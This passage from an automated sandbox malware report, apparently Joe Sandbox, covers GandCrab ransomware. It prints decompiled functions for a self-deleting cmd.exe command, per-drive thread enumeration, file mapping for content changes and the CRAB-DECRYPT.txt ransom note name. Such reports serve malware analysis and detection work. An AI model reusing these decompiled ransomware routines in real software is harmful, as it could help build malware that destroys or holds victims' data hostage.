VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0F586D5D

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: c9123096018abbb3d8c8dcb90d20ba123dd4e7a94fb0e55db0336575ac45390d
Instruction ID: 581344171a8934cd9380a76f16cba41b138bad6181c07b35ff77a8186af11899
Opcode Fuzzy Hash: c9123096018abbb3d8c8dcb90d20ba123dd4e7a94fb0e55db0336575ac45390d
Instruction Fuzzy Hash: 3001B9753413007BF3201B64AE8AF6A3F5CEB45B26F100121FB05F52C1D7ED692B9669

Uniqueness

Uniqueness Score: -1.00%

Function 0F585350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F585350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f585376
0x0f58537a
0x0f58537e
0x0f585388
0x0f585390
0x0f585399
0x0f5853b3
0x0f5853b3
0x0f585390
0x0f5853bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F5854E9,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000), ref: 0F585366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585388
wsprintfW.USER32 ref: 0F585399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F5853B3
ExitProcess.KERNEL32 ref: 0F5853BB

Strings

open, xrefs: 0F5853AC
cmd.exe, xrefs: 0F5853A7
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F585393

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
Instruction ID: e09e45b48663f837c3e9811199cf4d778e08a4ffb85ac4991b933953e111c7fa
Opcode Fuzzy Hash: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
Instruction Fuzzy Hash: D6F01C317C231033F12126645D0BF0B2E59AB89F32F280016B704BE2C29AE8641786A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F582C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F582C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf58f290; // 0x21
				asm("movdqu xmm0, [0xf58f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F582AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0f582c59
0x0f582c5e
0x0f582c66
0x0f582c69
0x0f582c70
0x0f582c76
0x0f582c79
0x0f582ce9
0x0f582cf2
0x0f582d01
0x0f582c7b
0x0f582c7e
0x0f582c9f
0x0f582cbd
0x0f582ccb
0x0f582cd7
0x0f582c80
0x0f582c94
0x0f582c94
0x0f582c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F582C8A
BeginPaint.USER32(?,?), ref: 0F582C9F
lstrlenW.KERNEL32(?), ref: 0F582CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F582CBD
EndPaint.USER32(?,?), ref: 0F582CCB
CreateThread.KERNEL32 ref: 0F582CE9
DestroyWindow.USER32(?), ref: 0F582CF2

Strings

GandCrab!, xrefs: 0F582C5E

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
Instruction ID: 7dd70b9b9c76b731d7425979708289aed013986bcc28d5dceecaf99a43ece8a4
Opcode Fuzzy Hash: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
Instruction Fuzzy Hash: 11119332104209BFD711DF54DD0AFBA7FA8FB48722F001616FD41E5290E7759526EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F583FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F583FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf58f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F586F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F585670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0f583ff6
0x0f584008
0x0f58400c
0x0f584010
0x0f58401b
0x0f58401e
0x0f584020
0x0f584023
0x0f584028
0x0f58402c
0x0f584031
0x0f58403b
0x0f58403f
0x0f584046
0x0f584050
0x0f584054
0x0f58405a
0x0f584063
0x0f584072
0x0f584075
0x0f584082
0x0f584085
0x0f58408b
0x0f584092
0x0f58409f
0x0f5840a3
0x0f5840a4
0x0f5840a4
0x0f5840a7
0x0f5840a8
0x0f5840b6
0x0f5840ba
0x0f5840bd
0x0f5840c7
0x0f5840cf
0x0f5840d5
0x0f5840db
0x0f5840e1
0x0f5840eb
0x0f5840f2
0x0f5840f6
0x0f5840fa
0x0f5840fc
0x0f584104
0x0f58410d
0x0f58416c
0x0f584170
0x0f58410f
0x0f58410f
0x0f584112
0x0f584118
0x0f58411f
0x0f584120
0x0f584127
0x0f58412b
0x0f584130
0x0f584137
0x0f58413a
0x0f58413e
0x0f584148
0x0f58414a
0x0f58414e
0x0f584151
0x0f584154
0x0f584154
0x0f584154
0x0f58415a
0x0f58415e
0x0f584162
0x0f584166
0x0f584166
0x0f584176
0x0f58419a
0x0f584178
0x0f584178
0x0f584182
0x0f584186
0x0f58418d
0x0f5841a4
0x0f5841a8
0x0f5841c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F584010
GetTickCount.KERNEL32 ref: 0F584035
GetDriveTypeW.KERNEL32(?), ref: 0F58405A
CreateThread.KERNEL32 ref: 0F584099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F5840DB
GetTickCount.KERNEL32 ref: 0F5840E1

Strings

?:\, xrefs: 0F584023

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
Instruction ID: fd7a28090f564a608222304982e78d080365528b895bd94cc6acfd6b22cf9f7f
Opcode Fuzzy Hash: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
Instruction Fuzzy Hash: D0514370908301DFC310DF18C984B5BBBE1FF88324F504A2EE989AB391D375A949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F586F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F586F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F586DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f586f59
0x0f586f5f
0x0f586f6e
0x0f586f7c
0x0f586f90
0x0f586f98
0x0f586fa0
0x0f586fa8
0x0f586fb6
0x0f586fcb
0x0f586fdb
0x0f586fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F586F59
wsprintfW.USER32 ref: 0F586F6E
InitializeCriticalSection.KERNEL32(?), ref: 0F586F7C
VirtualAlloc.KERNEL32 ref: 0F586FB0

Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
Part of subcall function 0F586DF0: lstrcatW.KERNEL32 ref: 0F586E3B
Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F586FDB
ExitThread.KERNEL32 ref: 0F586FE3

Strings

%c:\, xrefs: 0F586F68

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
Instruction ID: 291b2525e64ddbce8bf315f89cba2bc34e9f46a70543ada91606c02c37840372
Opcode Fuzzy Hash: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
Instruction Fuzzy Hash: BB01D6B0144300BBE7109F20CD8AF173FA8AB44B21F004615FB65AA2C1D7B8951ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 0F582890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0F582890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F583030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F583030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0F583030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0F588400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0F582830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0f582890
0x0f582899
0x0f58289b
0x0f5828b1
0x0f5828b6
0x0f5828f9
0x0f582901
0x0f5828b8
0x0f5828c0
0x0f5828c3
0x0f5828ca
0x0f5828cf
0x0f5828d0
0x0f5828d8
0x0f5828e5
0x0f5828eb
0x0f5828f0
0x0f582910
0x0f582914
0x0f582916
0x0f58291d
0x0f58291f
0x0f582920
0x0f582920
0x0f582923
0x0f582926
0x0f58292b
0x0f58292b
0x0f58292e
0x0f58293f
0x0f582942
0x0f582942
0x0f582951
0x0f582954
0x0f58295e
0x0f5828f2
0x0f5828f3
0x00000000
0x0f5828f3
0x0f5828f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F582C02), ref: 0F5828AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F582C02), ref: 0F5828BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F582C02), ref: 0F5828E5
CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F5828F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F582C02), ref: 0F58290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F582C02), ref: 0F582942
CloseHandle.KERNEL32(?,?,?,0F582C02), ref: 0F582951
CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F582954

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: ffb715212ba1b1016c3e9d2017736db529608780650aae35b3ede2d28a36abef
Instruction ID: ec4abebaa35db9d10f304be953c7a5cccd1725b7aec16680b4e70216dac03bd5
Opcode Fuzzy Hash: ffb715212ba1b1016c3e9d2017736db529608780650aae35b3ede2d28a36abef
Instruction Fuzzy Hash: 742104B1A002197FE7107BB49C85F7E7F6CEB85666F100236FD05B2281E7389C1759A1

Uniqueness

Uniqueness Score: -1.00%

Function 0F5869B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5869B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf592a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf592a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0f5869b3
0x0f5869bc
0x0f5869be
0x0f5869d2
0x0f5869d7
0x0f5869dc
0x0f5869f0
0x0f5869fa
0x0f5869e0
0x0f5869e0
0x0f5869e6
0x0f5869e9
0x0f5869ea
0x00000000
0x00000000
0x00000000
0x0f5869ea
0x0f5869ee
0x0f586a17
0x0f586a1f
0x0f586a25
0x0f586a2b
0x0f586a30
0x0f586a36
0x0f586a82
0x0f586a89
0x0f586a8c
0x0f586a38
0x0f586a38
0x0f586a3e
0x0f586a42
0x0f586a44
0x0f586a44
0x0f586a49
0x0f586a69
0x0f586a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f586a4b
0x0f586a50
0x0f586a50
0x0f586a56
0x00000000
0x00000000
0x0f586a5c
0x0f586a5e
0x00000000
0x0f586a60
0x0f586a60
0x0f586a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0f586a67
0x00000000
0x0f586a5e
0x0f586a80
0x0f586a80
0x00000000
0x0f586a80
0x00000000
0x0f586a6f
0x0f586a6f
0x0f586a73
0x0f586a76
0x0f586a79
0x0f586a7e
0x0f586a3e
0x0f586a8f
0x0f586a97
0x0f586aa6
0x00000000
0x00000000
0x00000000
0x0f5869ee
0x0f5869c0
0x0f5869c9
0x0f5869c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F586AEA), ref: 0F5869D2

Strings

%s , xrefs: 0F586A19

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
Instruction ID: 9442ac9452c9bb0c8e542145a2bc15fea8f6e6d51cd991a26dfaee94589e9f39
Opcode Fuzzy Hash: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
Instruction Fuzzy Hash: 9621F632A01225D7D7306B5C9D413B673A8FB85721F458276EC46BB281E7B5AD53C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F584E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F584E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F589170( &_v92, 0, 0x44);
				_t15 =  *0xf592a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf592a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f584e1c
0x0f584e22
0x0f584e24
0x0f584e29
0x0f584e2e
0x0f584e36
0x0f584e39
0x0f584e3c
0x0f584e41
0x0f584e48
0x0f584e4d
0x0f584e58
0x0f584e77
0x0f584e8d
0x0f584e98
0x0f584e79
0x0f584e83
0x0f584e83

APIs

_memset.LIBCMT ref: 0F584E29
CreateProcessW.KERNEL32 ref: 0F584E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0F584E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E92

Strings

D, xrefs: 0F584E58

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
Instruction ID: 6ca3ca8a7fcf8c385af7b3d77c7f72793dacd1f07f62118ef84623aeab92ddc8
Opcode Fuzzy Hash: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
Instruction Fuzzy Hash: 08018471E40319ABDB20DFA4DC46BDE7FB8EF04725F104126FA08FA280E7B525548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F583C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F583C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
